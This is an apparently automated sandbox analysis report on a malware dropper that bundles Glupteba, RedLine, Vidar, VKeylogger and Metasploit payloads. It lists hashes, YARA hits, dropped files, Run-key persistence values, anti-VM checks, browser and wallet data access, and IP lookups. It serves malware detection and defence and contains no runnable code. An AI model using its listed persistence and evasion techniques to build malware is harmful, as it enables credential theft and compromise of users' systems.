glupteba | baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

Target

setup_x86_x64_install.exe
Size

2.2MB
MD5

e3b3a95ef03de0de77cca7a54ea22c94
SHA1

d318d234f8f27f25de660d9881113df9d11c24ff
SHA256

baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15
SHA512

3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d

Score

10^/10

glupteba metasploit redline vidar vkeylogger aspackv2 backdoor discovery dropper evasion infostealer keylogger loader persistence spyware stealer themida trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

Processes:

resource	yara_rule
behavioral5/memory/1368-592-0x0000000004710000-0x0000000005037000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4644	4792	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2904	4792	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5876	4792	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7348	4792	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral5/memory/452-267-0x0000000004D70000-0x0000000004D9E000-memory.dmp	family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 12 IoCs

Processes:

WerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 1252 created 2340	1252	WerFault.exe	Fri1544861ac3fe6a.exe
PID 1180 created 4188	1180	WerFault.exe	Fri15af75ee9b.exe
PID 2904 created 4648	2904	rundll32.exe	rundll32.exe
PID 1400 created 4916	1400	WerFault.exe	setup.exe
PID 724 created 4540	724	WerFault.exe	Pubdate.exe
PID 5408 created 1164	5408	WerFault.exe	2.exe
PID 2440 created 5792	2440	WerFault.exe	rundll32.exe
PID 4344 created 3800	4344	WerFault.exe	3155661.exe
PID 5904 created 5524	5904	WerFault.exe	4089607.exe
PID 500 created 5268	500	WerFault.exe	7570742.exe
PID 6104 created 1732	6104		WerFault.exe
PID 5080 created 5972	5080	WerFault.exe	GcleanerEU.exe

VKeylogger
A keylogger first seen in Nov 2020.
stealer keylogger vkeylogger

VKeylogger Payload 1 IoCs

Processes:

resource	yara_rule
behavioral5/memory/1080-603-0x0000000002EE0000-0x0000000002EEE000-memory.dmp	family_vkeylogger

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral5/memory/2340-211-0x0000000003EE0000-0x0000000003FB3000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS4FE09193\libstdc++-6.dll	aspack_v212_v242

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

zab2our.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts zab2our.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	zab2our.exe

Executes dropped EXE 47 IoCs

Processes:

setup_installer.exesetup_install.exeFri156ec98815f89c.exeFri157e25afd971.exeFri1544861ac3fe6a.exeFri155442fc38b.exeFri15af75ee9b.exeFri157e25afd971.tmpFri1553f0ee90.exezab2our.exeLzmwAqmV.exe3155661.exe5554559.exe4132860.exeChrome 5.exePublicDwlBrowser1100.exe2.exesetup.exePubdate.exesetup_2.exe3002.exesetup_2.tmpjhuuee.exe1018857.exeBearVpn 3.exe7570742.exesetup_2.exe4089607.exesetup_2.tmp8050610.exe3002.exe5486143.exeWinHoster.exe5lf4wMbH4mC3Lxf2JAoQ37rC.exe3069781.exeultramediaburner.exeultramediaburner.tmpGizhushadugu.exeUltraMediaBurner.exeXydisagavi.exeservices64.exeGcleanerEU.exeinstaller.exeanyname.exeanyname.exetaskkill.exe8446919.exe

pid	process
3828	setup_installer.exe
4152	setup_install.exe
3780	Fri156ec98815f89c.exe
3768	Fri157e25afd971.exe
2340	Fri1544861ac3fe6a.exe
3232	Fri155442fc38b.exe
4188	Fri15af75ee9b.exe
1124	Fri157e25afd971.tmp
1164	Fri1553f0ee90.exe
3184	zab2our.exe
3584	LzmwAqmV.exe
3800	3155661.exe
4860	5554559.exe
452	4132860.exe
3964	Chrome 5.exe
4460	PublicDwlBrowser1100.exe
1164	2.exe
4916	setup.exe
4540	Pubdate.exe
3588	setup_2.exe
1632	3002.exe
3832	setup_2.tmp
4852	jhuuee.exe
4452	1018857.exe
5192	BearVpn 3.exe
5268	7570742.exe
5372	setup_2.exe
5524	4089607.exe
5536	setup_2.tmp
5600	8050610.exe
5712	3002.exe
5724	5486143.exe
5888	WinHoster.exe
6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
1732	3069781.exe
420	ultramediaburner.exe
5336	ultramediaburner.tmp
4000	Gizhushadugu.exe
668	UltraMediaBurner.exe
5552	Xydisagavi.exe
5256	services64.exe
5972	GcleanerEU.exe
4356	installer.exe
5884	anyname.exe
6056	anyname.exe
1656	taskkill.exe
2976	8446919.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1018857.exe5lf4wMbH4mC3Lxf2JAoQ37rC.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1018857.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1018857.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5lf4wMbH4mC3Lxf2JAoQ37rC.exe

Loads dropped DLL 15 IoCs

Processes:

setup_install.exeFri157e25afd971.tmprundll32.exesetup_2.tmpsetup_2.tmprundll32.exeinstaller.exeN7ZrGHP20fmHvuKzPAPhMF87.exe

pid	process
4152	setup_install.exe
4152	setup_install.exe
4152	setup_install.exe
4152	setup_install.exe
4152	setup_install.exe
4152	setup_install.exe
1124	Fri157e25afd971.tmp
4648	rundll32.exe
3832	setup_2.tmp
5536	setup_2.tmp
5792	rundll32.exe
4356	installer.exe
4356	installer.exe
4356	installer.exe
6028	N7ZrGHP20fmHvuKzPAPhMF87.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1018857.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5554559.exezab2our.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5554559.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\UltraMediaBurner\\Sirovidebi.exe\""	zab2our.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

1018857.exe5lf4wMbH4mC3Lxf2JAoQ37rC.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1018857.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5lf4wMbH4mC3Lxf2JAoQ37rC.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

installer.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com
4 ipinfo.io
91 ipinfo.io
177 ipinfo.io
222 ipinfo.io
2 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

1018857.exe5lf4wMbH4mC3Lxf2JAoQ37rC.exe

pid process

4452 1018857.exe
6052 5lf4wMbH4mC3Lxf2JAoQ37rC.exe

flow	ioc
4	ip-api.com
4	ipinfo.io
91	ipinfo.io
177	ipinfo.io
222	ipinfo.io
2	ipinfo.io

pid	process
4452	1018857.exe
6052	5lf4wMbH4mC3Lxf2JAoQ37rC.exe

Drops file in Program Files directory 12 IoCs

Processes:

setup_2.tmpzab2our.exeultramediaburner.tmp

description	ioc	process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-HVMO0.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe	zab2our.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-BULK2.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files\Windows Photo Viewer\KMHPCXRQCF\ultramediaburner.exe.config	zab2our.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-U7IQ2.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\Sirovidebi.exe	zab2our.exe
File created	C:\Program Files (x86)\UltraMediaBurner\Sirovidebi.exe.config	zab2our.exe

Drops file in Windows directory 1 IoCs

Processes:

WerFault.exe

description ioc process

File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Program crash 56 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2416	2340	WerFault.exe	Fri1544861ac3fe6a.exe
2472	4188	WerFault.exe	Fri15af75ee9b.exe
2384	4648	WerFault.exe	rundll32.exe
2904	4916	WerFault.exe	setup.exe
5128	4540	WerFault.exe	Pubdate.exe
5664	1164	WerFault.exe	2.exe
5824	5792	WerFault.exe	rundll32.exe
5196	3800	WerFault.exe	3155661.exe
344	5524	WerFault.exe	4089607.exe
1692	5268	WerFault.exe	7570742.exe
1212	1732	WerFault.exe	3069781.exe
5968	5972	WerFault.exe	GcleanerEU.exe
5088	5672	WerFault.exe	rundll32.exe
5968	3088	WerFault.exe	gcleaner.exe
5052	2976	WerFault.exe	8446919.exe
5024	3176	WerFault.exe	askinstall52.exe
5416	1368	WerFault.exe	app.exe
6184	1080	WerFault.exe	I71Z7ipHVnjTBhsQBRq8F9CV.exe
6792	1636	WerFault.exe	srFyWHY6WRa5_WSlKzO3Xbh9.exe
5868	5520	WerFault.exe	l0BGeAte0WBq3zjQ_llxqNAK.exe
2056	2340	WerFault.exe	n8r0iSjpJwRbJ4CZRQpiuYz0.exe
7164	5288	WerFault.exe	9ZYMXQj8c7cYofKmgqeZQscL.exe
6652	6052	WerFault.exe	5lf4wMbH4mC3Lxf2JAoQ37rC.exe
5860	1860	WerFault.exe	mmOry7dBfMvTPXLUeFEPMn9_.exe
7840	7376	WerFault.exe	rundll32.exe
5628	5216	WerFault.exe	5902677.exe
5192	6976	WerFault.exe	2526580.exe
9668	6680	WerFault.exe	4542136.exe
9876	5492	WerFault.exe	5CaFX5G3LWOsJ9nhFxB5BqJv.exe
2796	5632	WerFault.exe	4210999.exe
11328	10332	WerFault.exe	B2A4.exe
12284	3804	WerFault.exe	DF14.exe
12028	7128	WerFault.exe	UopEIp.exe
13908	9156	WerFault.exe	EE85.exe
1544	4860	WerFault.exe	8m8H4MG_LaWOxWBdTGWXMROj.exe
14976	14652	WerFault.exe	N7ZrGHP20fmHvuKzPAPhMF87.exe
17080	2992	WerFault.exe	N7ZrGHP20fmHvuKzPAPhMF87.exe
3060	17540	WerFault.exe	sNOldKfrjNE4mmfOTLZWB4RK.exe
1732	19028	WerFault.exe	8m8H4MG_LaWOxWBdTGWXMROj.exe
20624	17084	WerFault.exe	sNOldKfrjNE4mmfOTLZWB4RK.exe
20716	21032	WerFault.exe	8m8H4MG_LaWOxWBdTGWXMROj.exe
22788	1448	WerFault.exe	8m8H4MG_LaWOxWBdTGWXMROj.exe
23424	23548	WerFault.exe	N7ZrGHP20fmHvuKzPAPhMF87.exe
10124	25492	WerFault.exe	8m8H4MG_LaWOxWBdTGWXMROj.exe
9464	10744	WerFault.exe	8m8H4MG_LaWOxWBdTGWXMROj.exe
26656	8268	WerFault.exe	8456642.exe
24100	7280	WerFault.exe	3816529.exe
14980	20688	WerFault.exe	sNOldKfrjNE4mmfOTLZWB4RK.exe
25468	22212	WerFault.exe	sNOldKfrjNE4mmfOTLZWB4RK.exe
16204	25248	WerFault.exe	N7ZrGHP20fmHvuKzPAPhMF87.exe
16068	25896	WerFault.exe	N7ZrGHP20fmHvuKzPAPhMF87.exe
31696	30200	WerFault.exe	sNOldKfrjNE4mmfOTLZWB4RK.exe
23144	15188	WerFault.exe	N7ZrGHP20fmHvuKzPAPhMF87.exe
27236	33584	WerFault.exe	8m8H4MG_LaWOxWBdTGWXMROj.exe
25984	31260	WerFault.exe	8m8H4MG_LaWOxWBdTGWXMROj.exe
36660	6596	WerFault.exe	md8_8eus.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exerundll32.exeWerFault.exeN7ZrGHP20fmHvuKzPAPhMF87.exeWerFault.exesNOldKfrjNE4mmfOTLZWB4RK.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	rundll32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6020 schtasks.exe
6824 schtasks.exe
1180 schtasks.exe
6500 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

6308 timeout.exe
12092 timeout.exe

pid	process
6020	schtasks.exe
6824	schtasks.exe
1180	schtasks.exe
6500	schtasks.exe

pid	process
6308	timeout.exe
12092	timeout.exe

Enumerates system info in registry 2 TTPs 24 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeN7ZrGHP20fmHvuKzPAPhMF87.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesNOldKfrjNE4mmfOTLZWB4RK.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	rundll32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	N7ZrGHP20fmHvuKzPAPhMF87.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	sNOldKfrjNE4mmfOTLZWB4RK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	sNOldKfrjNE4mmfOTLZWB4RK.exe
